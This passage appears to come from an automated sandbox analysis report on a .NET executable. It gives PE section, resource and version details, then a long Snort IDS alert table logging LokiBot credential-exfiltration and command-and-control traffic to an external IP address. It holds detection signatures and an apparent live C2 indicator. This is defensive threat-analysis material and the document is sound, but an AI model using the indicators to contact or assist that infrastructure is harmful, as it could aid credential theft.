                                              .reloc0x6e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x6c0a00x380dataEnglishUnited States
                                              RT_MANIFEST0x6c4200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              LegalCopyrightAll Rights Reserved
                                              Assembly Version5.870.486.295
                                              InternalName.exe
                                              FileVersion5.870.486.295
                                              CompanyName Inc.
                                              LegalTrademarks
                                              Comments
                                              ProductName
                                              ProductVersion5.870.486.295
                                              FileDescription
                                              OriginalFilename.exe
                                              Translation0x0000 0x0514

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              03/15/21-20:00:59.299750TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969680192.168.2.587.251.79.157
                                              03/15/21-20:00:59.299750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969680192.168.2.587.251.79.157
                                              03/15/21-20:00:59.299750TCP2025381ET TROJAN LokiBot Checkin4969680192.168.2.587.251.79.157
                                              03/15/21-20:00:59.299750TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969680192.168.2.587.251.79.157
                                              03/15/21-20:00:59.912760TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969780192.168.2.587.251.79.157
                                              03/15/21-20:00:59.912760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969780192.168.2.587.251.79.157
                                              03/15/21-20:00:59.912760TCP2025381ET TROJAN LokiBot Checkin4969780192.168.2.587.251.79.157
                                              03/15/21-20:00:59.912760TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969780192.168.2.587.251.79.157
                                              03/15/21-20:01:01.352142TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14969880192.168.2.587.251.79.157
                                              03/15/21-20:01:01.352142TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969880192.168.2.587.251.79.157
                                              03/15/21-20:01:01.352142TCP2025381ET TROJAN LokiBot Checkin4969880192.168.2.587.251.79.157
                                              03/15/21-20:01:01.352142TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24969880192.168.2.587.251.79.157
                                              03/15/21-20:01:01.791880TCP2025483ET TROJAN LokiBot Fake 404 Response804969887.251.79.157192.168.2.5
                                              03/15/21-20:01:02.461606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14969980192.168.2.587.251.79.157
                                              03/15/21-20:01:02.461606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969980192.168.2.587.251.79.157
                                              03/15/21-20:01:02.461606TCP2025381ET TROJAN LokiBot Checkin4969980192.168.2.587.251.79.157
                                              03/15/21-20:01:02.461606TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24969980192.168.2.587.251.79.157
                                              03/15/21-20:01:02.822240TCP2025483ET TROJAN LokiBot Fake 404 Response804969987.251.79.157192.168.2.5
                                              03/15/21-20:01:03.117405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970080192.168.2.587.251.79.157
                                              03/15/21-20:01:03.117405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970080192.168.2.587.251.79.157
                                              03/15/21-20:01:03.117405TCP2025381ET TROJAN LokiBot Checkin4970080192.168.2.587.251.79.157
                                              03/15/21-20:01:03.117405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970080192.168.2.587.251.79.157
                                              03/15/21-20:01:03.381765TCP2025483ET TROJAN LokiBot Fake 404 Response804970087.251.79.157192.168.2.5
                                              03/15/21-20:01:04.226190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970180192.168.2.587.251.79.157
                                              03/15/21-20:01:04.226190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970180192.168.2.587.251.79.157
                                              03/15/21-20:01:04.226190TCP2025381ET TROJAN LokiBot Checkin4970180192.168.2.587.251.79.157
                                              03/15/21-20:01:04.226190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970180192.168.2.587.251.79.157
                                              03/15/21-20:01:07.057657TCP2025483ET TROJAN LokiBot Fake 404 Response804970187.251.79.157192.168.2.5
                                              03/15/21-20:01:07.329028TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970280192.168.2.587.251.79.157
                                              03/15/21-20:01:07.329028TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970280192.168.2.587.251.79.157
                                              03/15/21-20:01:07.329028TCP2025381ET TROJAN LokiBot Checkin4970280192.168.2.587.251.79.157
                                              03/15/21-20:01:07.329028TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970280192.168.2.587.251.79.157
                                              03/15/21-20:01:08.041174TCP2025483ET TROJAN LokiBot Fake 404 Response804970287.251.79.157192.168.2.5
                                              03/15/21-20:01:08.319140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970380192.168.2.587.251.79.157
                                              03/15/21-20:01:08.319140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970380192.168.2.587.251.79.157
                                              03/15/21-20:01:08.319140TCP2025381ET TROJAN LokiBot Checkin4970380192.168.2.587.251.79.157
                                              03/15/21-20:01:08.319140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970380192.168.2.587.251.79.157
                                              03/15/21-20:01:09.199748TCP2025483ET TROJAN LokiBot Fake 404 Response804970387.251.79.157192.168.2.5
                                              03/15/21-20:01:09.459261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970480192.168.2.587.251.79.157
                                              03/15/21-20:01:09.459261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970480192.168.2.587.251.79.157
                                              03/15/21-20:01:09.459261TCP2025381ET TROJAN LokiBot Checkin4970480192.168.2.587.251.79.157
                                              03/15/21-20:01:09.459261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970480192.168.2.587.251.79.157
                                              03/15/21-20:01:09.990872TCP2025483ET TROJAN LokiBot Fake 404 Response804970487.251.79.157192.168.2.5
                                              03/15/21-20:01:10.247131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970680192.168.2.587.251.79.157
                                              03/15/21-20:01:10.247131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970680192.168.2.587.251.79.157
                                              03/15/21-20:01:10.247131TCP2025381ET TROJAN LokiBot Checkin4970680192.168.2.587.251.79.157
                                              03/15/21-20:01:10.247131TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970680192.168.2.587.251.79.157
                                              03/15/21-20:01:10.543726TCP2025483ET TROJAN LokiBot Fake 404 Response804970687.251.79.157192.168.2.5
                                              03/15/21-20:01:10.814030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970780192.168.2.587.251.79.157
                                              03/15/21-20:01:10.814030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.587.251.79.157
                                              03/15/21-20:01:10.814030TCP2025381ET TROJAN LokiBot Checkin4970780192.168.2.587.251.79.157
                                              03/15/21-20:01:10.814030TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970780192.168.2.587.251.79.157
                                              03/15/21-20:01:11.073519TCP2025483ET TROJAN LokiBot Fake 404 Response804970787.251.79.157192.168.2.5
                                              03/15/21-20:01:11.333466TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.587.251.79.157
                                              03/15/21-20:01:11.333466TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.587.251.79.157
                                              03/15/21-20:01:11.333466TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.587.251.79.157
                                              03/15/21-20:01:11.333466TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.587.251.79.157
                                              03/15/21-20:01:11.586393TCP2025483ET TROJAN LokiBot Fake 404 Response804970887.251.79.157192.168.2.5
                                              03/15/21-20:01:11.848733TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.587.251.79.157
                                              03/15/21-20:01:11.848733TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.587.251.79.157
                                              03/15/21-20:01:11.848733TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.587.251.79.157
                                              03/15/21-20:01:11.848733TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.587.251.79.157
                                              03/15/21-20:01:12.111888TCP2025483ET TROJAN LokiBot Fake 404 Response804970987.251.79.157192.168.2.5
                                              03/15/21-20:01:12.375237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971080192.168.2.587.251.79.157
                                              03/15/21-20:01:12.375237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.587.251.79.157
                                              03/15/21-20:01:12.375237TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.587.251.79.157
                                              03/15/21-20:01:12.375237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971080192.168.2.587.251.79.157
                                              03/15/21-20:01:12.661371TCP2025483ET TROJAN LokiBot Fake 404 Response804971087.251.79.157192.168.2.5
                                              03/15/21-20:01:12.929997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.587.251.79.157
                                              03/15/21-20:01:12.929997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.587.251.79.157
                                              03/15/21-20:01:12.929997TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.587.251.79.157
                                              03/15/21-20:01:12.929997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.587.251.79.157
                                              03/15/21-20:01:13.460848TCP2025483ET TROJAN LokiBot Fake 404 Response804971187.251.79.157192.168.2.5
                                              03/15/21-20:01:13.736500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.587.251.79.157
                                              03/15/21-20:01:13.736500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.587.251.79.157
                                              03/15/21-20:01:13.736500TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.587.251.79.157
                                              03/15/21-20:01:13.736500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.587.251.79.157
                                              03/15/21-20:01:14.088730TCP2025483ET TROJAN LokiBot Fake 404 Response804971287.251.79.157192.168.2.5
                                              03/15/21-20:01:14.345824TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.587.251.79.157
                                              03/15/21-20:01:14.345824TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.587.251.79.157
                                              03/15/21-20:01:14.345824TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.587.251.79.157
                                              03/15/21-20:01:14.345824TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.587.251.79.157
                                              03/15/21-20:01:14.636305TCP2025483ET TROJAN LokiBot Fake 404 Response804971387.251.79.157192.168.2.5
                                              03/15/21-20:01:14.911690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.587.251.79.157
                                              03/15/21-20:01:14.911690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.587.251.79.157
                                              03/15/21-20:01:14.911690TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.587.251.79.157
                                              03/15/21-20:01:14.911690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.587.251.79.157
                                              03/15/21-20:01:15.317789TCP2025483ET TROJAN LokiBot Fake 404 Response804971487.251.79.157192.168.2.5
                                              03/15/21-20:01:15.558859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.587.251.79.157
                                              03/15/21-20:01:15.558859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.587.251.79.157
                                              03/15/21-20:01:15.558859TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.587.251.79.157
                                              03/15/21-20:01:15.558859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.587.251.79.157
                                              03/15/21-20:01:15.838733TCP2025483ET TROJAN LokiBot Fake 404 Response804971587.251.79.157192.168.2.5
                                              03/15/21-20:01:16.089930TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.587.251.79.157
                                              03/15/21-20:01:16.089930TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.587.251.79.157
                                              03/15/21-20:01:16.089930TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.587.251.79.157
                                              03/15/21-20:01:16.089930TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.587.251.79.157
                                              03/15/21-20:01:16.392034TCP2025483ET TROJAN LokiBot Fake 404 Response804971687.251.79.157192.168.2.5
                                              03/15/21-20:01:16.657506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.587.251.79.157
                                              03/15/21-20:01:16.657506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.587.251.79.157
                                              03/15/21-20:01:16.657506TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.587.251.79.157
                                              03/15/21-20:01:16.657506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.587.251.79.157
                                              03/15/21-20:01:16.946177TCP2025483ET TROJAN LokiBot Fake 404 Response804971787.251.79.157192.168.2.5
                                              03/15/21-20:01:17.197165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.587.251.79.157
                                              03/15/21-20:01:17.197165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.587.251.79.157
                                              03/15/21-20:01:17.197165TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.587.251.79.157
                                              03/15/21-20:01:17.197165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.587.251.79.157
                                              03/15/21-20:01:17.449021TCP2025483ET TROJAN LokiBot Fake 404 Response804971887.251.79.157192.168.2.5
                                              03/15/21-20:01:17.695734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.587.251.79.157
                                              03/15/21-20:01:17.695734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.587.251.79.157
                                              03/15/21-20:01:17.695734TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.587.251.79.157
                                              03/15/21-20:01:17.695734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.587.251.79.157
                                              03/15/21-20:01:17.987251TCP2025483ET TROJAN LokiBot Fake 404 Response804971987.251.79.157192.168.2.5
                                              03/15/21-20:01:18.244799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.587.251.79.157
                                              03/15/21-20:01:18.244799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.587.251.79.157
                                              03/15/21-20:01:18.244799TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.587.251.79.157
                                              03/15/21-20:01:18.244799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.587.251.79.157
                                              03/15/21-20:01:18.718092TCP2025483ET TROJAN LokiBot Fake 404 Response804972087.251.79.157192.168.2.5
                                              03/15/21-20:01:18.964074TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.587.251.79.157
                                              03/15/21-20:01:18.964074TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.587.251.79.157
                                              03/15/21-20:01:18.964074TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.587.251.79.157
                                              03/15/21-20:01:18.964074TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.587.251.79.157
                                              03/15/21-20:01:19.322258TCP2025483ET TROJAN LokiBot Fake 404 Response804972187.251.79.157192.168.2.5
                                              03/15/21-20:01:19.791693TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.587.251.79.157
                                              03/15/21-20:01:19.791693TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.587.251.79.157
                                              03/15/21-20:01:19.791693TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.587.251.79.157
                                              03/15/21-20:01:19.791693TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.587.251.79.157
                                              03/15/21-20:01:20.117541TCP2025483ET TROJAN LokiBot Fake 404 Response804972287.251.79.157192.168.2.5
                                              03/15/21-20:01:20.361542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.587.251.79.157
                                              03/15/21-20:01:20.361542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.587.251.79.157
                                              03/15/21-20:01:20.361542TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.587.251.79.157
                                              03/15/21-20:01:20.361542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.587.251.79.157
                                              03/15/21-20:01:20.618341TCP2025483ET TROJAN LokiBot Fake 404 Response804972387.251.79.157192.168.2.5
                                              03/15/21-20:01:21.004334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.587.251.79.157
                                              03/15/21-20:01:21.004334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.587.251.79.157
                                              03/15/21-20:01:21.004334TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.587.251.79.157
                                              03/15/21-20:01:21.004334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.587.251.79.157
                                              03/15/21-20:01:21.287939TCP2025483ET TROJAN LokiBot Fake 404 Response804972487.251.79.157192.168.2.5
                                              03/15/21-20:01:22.062018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.587.251.79.157
                                              03/15/21-20:01:22.062018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.587.251.79.157
                                              03/15/21-20:01:22.062018TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.587.251.79.157
                                              03/15/21-20:01:22.062018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.587.251.79.157
                                              03/15/21-20:01:23.039788TCP2025483ET TROJAN LokiBot Fake 404 Response804972587.251.79.157192.168.2.5
                                              03/15/21-20:01:23.293570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.587.251.79.157
                                              03/15/21-20:01:23.293570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.587.251.79.157
                                              03/15/21-20:01:23.293570TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.587.251.79.157
                                              03/15/21-20:01:23.293570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.587.251.79.157
                                              03/15/21-20:01:25.291952TCP2025483ET TROJAN LokiBot Fake 404 Response804972687.251.79.157192.168.2.5
                                              03/15/21-20:01:25.581075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.587.251.79.157
                                              03/15/21-20:01:25.581075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.587.251.79.157
                                              03/15/21-20:01:25.581075TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.587.251.79.157
                                              03/15/21-20:01:25.581075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.587.251.79.157
                                              03/15/21-20:01:26.542694TCP2025483ET TROJAN LokiBot Fake 404 Response804972787.251.79.157192.168.2.5
                                              03/15/21-20:01:26.790848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.587.251.79.157
                                              03/15/21-20:01:26.790848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.587.251.79.157
                                              03/15/21-20:01:26.790848TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.587.251.79.157
                                              03/15/21-20:01:26.790848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.587.251.79.157
                                              03/15/21-20:01:27.122605TCP2025483ET TROJAN LokiBot Fake 404 Response804972887.251.79.157192.168.2.5
                                              03/15/21-20:01:27.364126TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.364126TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.364126TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.364126TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.587.251.79.157
                                              03/15/21-20:01:27.610562TCP2025483ET TROJAN LokiBot Fake 404 Response804972987.251.79.157192.168.2.5
                                              03/15/21-20:01:27.852823TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.587.251.79.157
                                              03/15/21-20:01:27.852823TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.587.251.79.157
                                              03/15/21-20:01:27.852823TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.587.251.79.157
                                              03/15/21-20:01:27.852823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.587.251.79.157
                                              03/15/21-20:01:28.146227TCP2025483ET TROJAN LokiBot Fake 404 Response804973087.251.79.157192.168.2.5
                                              03/15/21-20:01:28.400492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.400492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.400492TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.400492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.587.251.79.157
                                              03/15/21-20:01:28.677203TCP2025483ET TROJAN LokiBot Fake 404 Response804973187.251.79.157192.168.2.5
                                              03/15/21-20:01:28.911929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.587.251.79.157
                                              03/15/21-20:01:28.911929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.587.251.79.157
                                              03/15/21-20:01:28.911929TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.587.251.79.157
                                              03/15/21-20:01:28.911929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.587.251.79.157
                                              03/15/21-20:01:29.195779TCP2025483ET TROJAN LokiBot Fake 404 Response804973287.251.79.157192.168.2.5
                                              03/15/21-20:01:29.450562TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.450562TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.450562TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.450562TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.706804TCP2025483ET TROJAN LokiBot Fake 404 Response804973387.251.79.157192.168.2.5
                                              03/15/21-20:01:29.958482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.587.251.79.157
                                              03/15/21-20:01:29.958482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.587.251.79.157
                                              03/15/21-20:01:29.958482TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.587.251.79.157
                                              03/15/21-20:01:29.958482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.587.251.79.157
                                              03/15/21-20:01:30.265339TCP2025483ET TROJAN LokiBot Fake 404 Response804973487.251.79.157192.168.2.5
                                              03/15/21-20:01:30.516411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.516411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.516411TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.516411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.769006TCP2025483ET TROJAN LokiBot Fake 404 Response804973587.251.79.157192.168.2.5
                                              03/15/21-20:01:31.008223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.008223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.008223TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.008223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.407385TCP2025483ET TROJAN LokiBot Fake 404 Response804973687.251.79.157192.168.2.5
                                              03/15/21-20:01:31.655733TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.587.251.79.157
                                              03/15/21-20:01:31.655733TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.587.251.79.157
                                              03/15/21-20:01:31.655733TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.587.251.79.157
                                              03/15/21-20:01:31.655733TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.587.251.79.157
                                              03/15/21-20:01:32.298559TCP2025483ET TROJAN LokiBot Fake 404 Response804973787.251.79.157192.168.2.5
                                              03/15/21-20:01:32.541887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.587.251.79.157
                                              03/15/21-20:01:32.541887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.587.251.79.157
                                              03/15/21-20:01:32.541887TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.587.251.79.157
                                              03/15/21-20:01:32.541887TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.587.251.79.157
                                              03/15/21-20:01:33.109786TCP2025483ET TROJAN LokiBot Fake 404 Response804973887.251.79.157192.168.2.5
                                              03/15/21-20:01:33.365221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.365221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.365221TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.365221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.615085TCP2025483ET TROJAN LokiBot Fake 404 Response804973987.251.79.157192.168.2.5
                                              03/15/21-20:01:33.848929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.587.251.79.157
                                              03/15/21-20:01:33.848929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.587.251.79.157
                                              03/15/21-20:01:33.848929TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.587.251.79.157
                                              03/15/21-20:01:33.848929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.587.251.79.157
                                              03/15/21-20:01:34.100251TCP2025483ET TROJAN LokiBot Fake 404 Response804974087.251.79.157192.168.2.5
                                              03/15/21-20:01:34.358578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.358578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.358578TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.358578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.628393TCP2025483ET TROJAN LokiBot Fake 404 Response804974187.251.79.157192.168.2.5
                                              03/15/21-20:01:34.878601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.587.251.79.157
                                              03/15/21-20:01:34.878601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.587.251.79.157
                                              03/15/21-20:01:34.878601TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.587.251.79.157
                                              03/15/21-20:01:34.878601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.587.251.79.157
                                              03/15/21-20:01:35.166644TCP2025483ET TROJAN LokiBot Fake 404 Response804974287.251.79.157192.168.2.5
                                              03/15/21-20:01:35.414646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.587.251.79.157
                                              03/15/21-20:01:35.414646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.587.251.79.157
